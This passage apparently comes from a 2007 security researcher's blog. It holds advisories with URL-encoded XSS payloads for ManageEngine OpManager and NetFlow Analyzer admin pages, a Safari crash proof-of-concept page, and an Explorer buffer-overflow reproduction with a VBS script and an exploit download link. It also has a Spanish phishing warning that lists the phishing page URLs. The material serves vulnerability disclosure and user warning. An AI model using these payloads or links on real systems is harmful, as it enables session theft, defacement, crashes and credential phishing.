21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter

http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation


http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations

http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E


#######################
NetFlow Analizer
#######################

http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1

http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true

#################### €nd ################################

Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Skype Phishing and other pay methoth Scam

Sunday, June 17, 2007
################################################
Skype Phishing and other pay methoth Scam
###############################################

Hoy me llego un correo solicitandome que actualizara
La informacion de mi cuenta de skype (sistema que no uso)


Es una nueva forma de hacerse con las contraseñas de los
incautos usuarios;pero esto va un poco mas lejos.

Si por desgracia accedemos a la web malefica:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html

ademas de perder nuestra cuenta de skype tenemos mucho
mas que perder.pues la pagina malefica, ademas intentara
por medio de engaño hacerse con varias de nuestras
contraseñas o datos importantes de nuestras formas
de pago por internet.

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php

Nuestra cuenta de PayPal :

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm


nuestra cuenta de MoneyBrookers

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/bookf.htm

asi como los posibles datos de nuestra targeta visa y/o mastercard.


aseguraos de que las direcciones que visitais son las autenticas
de los sitios de pago, si no,no introducir ningun dato en ellas y
aun siendo lejitimas , deberiais desconfiar igualmente.

################## €nd ###################################

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS

Saturday, June 16, 2007
############################################
Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS
Vendor Url:www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2007/06/
safari-301-552122-for-windows.html
Vendor notify:yes exploit available:yes
BID:http:24497
###########################################

Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crashes occur due to issues with the
functions to manage the History and all History,and will result
in loss of availability for the application.I don´t know if this
can execute arbitrary code.



#############
versions:
#############

Safari 3.0.1

###########
solution:
###########

Update to version 3.0.2

##########
timeline:
##########

discovered:14-06.2007
vendor notify:15-06-2007
vendor response:
disclosure:16-06-2007

#####################
details of the crash
#####################

see the screen shoot:

http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif

--

Crash !

AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd

#################
Safari Crash Poc
#################
save this file as html document and open it in safari
put some number in the second form and safai crash.

<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>

#################### €nd #####################

Thnx to estrella to be my ligth
Thnx to all Lostmon´s Groups
Thnx to all Who belive in me !!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Buffer overflow in extended file atributes in Explorer.exe

Monday, June 04, 2007
#######################################################
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Buffer overflow in extended file atributes.
Vendor url: http://www.microsoft.com/
Advisore:http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
Vendor notify:yes Vendor confirmed:yes Exploit include:NO
#######################################################

################
SUMARY:
################

1- History (how and why)
2-explanation of buffer overflow
3-versions tested
4-solution
5-timeline
6-response from vendor
7-Test
8-related vulns and documentations



####################
1-History:
####################


If we look this m$ advisory the information in section :

http://www.microsoft.com/technet/security/advisory/933052.mspx

--
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:

The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that
is sent in an e-mail message.
--

this is not all true :)

If the user download the file and put in a folder , wen open the
folder explorer crash...

If you open any program, what use windows API and ole32.dll for
open files,and you go to file/open and go to the folder with the
malformed doc file, explorer call ole32.dll and the program is
crashed and loosing all information not save.

Examples of this case :

notepad++ => http://notepad-plus.sourceforge.net/es/site.htm
(vendor notify on 27-05-2007 via Email (no response)

Multiple Macromedia family programs => http://www.macromedia.com
(Adobe vendor informed on 27-05-2007 via webform and Confirmed.
http://www.adobe.com/misc/securityform.html)

multiple others programs are afected.

Affter a simple study on the malformed word document exploit /vulns
i have a little observation and i think that this vuln could be done
in some other programs,not only in a word appz.

Affter monitoring explorer and some dlls i think what this is only
the first point of the iceberg.The overflow is done wen explorer
call the kernel module KERNEL32, wen make some system calls to
manage the information of any file whith ntdll.dll

In the function GetFileAttributesExW and GetFileAttributesW
(KERNEL32) and in the undocumented functions NtQueryInformationFile,
NtQueryDirectoryFile and NtSetInformationFile functions on ntdll.dll

Those functions obtain the extended file atributes if the information
is to long in subfunctions FileAllInformation() in FileNameInformation()
and other (look in file_information_class) we obtain a buffer overflow,
some others subfunctions can get the same error.

Windows show the extended file attributes in multiple parts of the system,
wen look a foñder, wen put the mouse over a file or a folder.

Other applications use the same files for do the same :)

#######################
2-Explanation
#######################

Extended file attributes is a file system feature that enables users to
associate computer files with metadata not interpreted by the filesystem,
whereas regular attributes have a purpose strictly defined by the filesystem
(such as permissions or records of creation and modification times). Unlike
forks, which can usually be as large as the maximum file size, extended
attributes are usually limited in size to a value significantly smaller than
the maximum file size. Typical uses can be storing the author of a document,
the character encoding of a plain-text document,or a checksum.




A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size of the buffer in 'FileAllInformation(),FileNameInformation' and other subfunctions in
Undocumented functions of NTDLL , resulting in a buffer overflow. With
a unknow impact.



This is the size of buffer in this related functions
and the main function involved

FileAllInformation
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile

FileNameInformation
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile

other functions can be vulnerables too
look this table:

http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html


wen we put the hand over a file explorer.exe call the extended
file attributes and show this information in a 'bubble' or wen
open a folder explorer look for obtain directory listing, name
files and other information about the files.

how to locate the overflow ?

1-create a new txt file for example explorer.txt
2-rigth click on the file and try propierties
3-in all of the boxes (author ,tittle ,subject,and in special
in comment text area) write multiples A for example or moore:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


4-use filemon http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

and include process explorer.exe

5-click on the txt propierties and click on accept or on aply .

6-go to filemon and look the log for explorer.exe you have some
similar to this :


21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options:
Create Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options:
OverwriteIf Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
30996
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation

the overflow is done :)

affter you can put the hand over the file and explorer show the extended file atributes
and some times filemon mark again the overflow


###################
3-versions tested
###################

i only test with :

Microsof windows XP Home edition all fixes 17/05/2007
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

###################
4-Solution
###################

Wait for a update or patch

####################
5-Timeline:
####################

Discovered:12-03-2007
Vendor notify:19-03-2007
Vendor response:22-03-2007
Private disclosure:17-05-2007
Public disclosure:04-06-2007

######################
6-Response from vendor
######################

Thank you for checking up on this case, We have concluded
our investigations on this matter and have found this crash
to be un-exploitable. This vulnerability is very similar to
another milworm posting (http://www.milw0rm.com/exploits/3419.
As we have not been able to find an exploitable angle for
this issue this crash will get tracking into the next available
Service Pack fix.

#####################
7- Test
#####################

1 download this exploit:
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
put uncompress it in c:\test or edit in EFA_test.vbs the correct
path were you put the malformed doc file.

2 copy EFA_test.vbs and edit the correct path to file.

3 execute EFA_test.vbs

the file look for the exteded file attributes
of the malformed doc file and wen try to read
the attribute "author" windows Scripting host
Is crashing.

Other overflows could be done in all boxes of
the file propperties.
The applications is crashing because we for look
the malformed doc file use a vbs script.
if any other aplication try to look the malformed
doc file crash too.

this is a simple test using a existing exploit for
microsoft ole32dll.dll , but the overflow is moore deep
is in ntdll.dll because ntdll.dll is the library what use
NtQueryInformationFile for obtain the extended file attributes.

is for that that this overflow it is posible to be
done in all file type with a malformed extended file attributes.



########################################
8-related vulns and documentations
########################################

########################
EFA_test.vbs
########################

Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next



###################
RELATED VULNS :
###################

http://secunia.com/advisories/10020/

http://secunia.com/advisories/10194/

http://osvdb.org/displayvuln.php?osvdb_id=31885

http://osvdb.org/displayvuln.php?osvdb_id=31886

http://osvdb.org/displayvuln.php?osvdb_id=31887

###################
Related Exploit
###################

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

#################
Related Microsoft
security bulletin
#################

http://www.microsoft.com/technet/security/advisory/933052.mspx

##################
RElated functions
##################

extended file attributes
http://en.wikipedia.org/wiki/Extended_file_attributes

GetExtFileProperties()
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1

File information class:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/
NT%20Objects/File/FILE_INFORMATION_CLASS.html

posible source code of ntdll
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h
http://source.winehq.org/source/dlls/ntdll/file.c
the links of ntdll.c and ntdll.h aparently are dead you can try
to search it in google´s cache, sorry for the inconvenience

###############################€nd#########################

thnx To estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
They put in my hands all what i need in this and others researchs.
Thnx to All Lostmon´s Group Team
Thnx to Microsoft for the responses.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
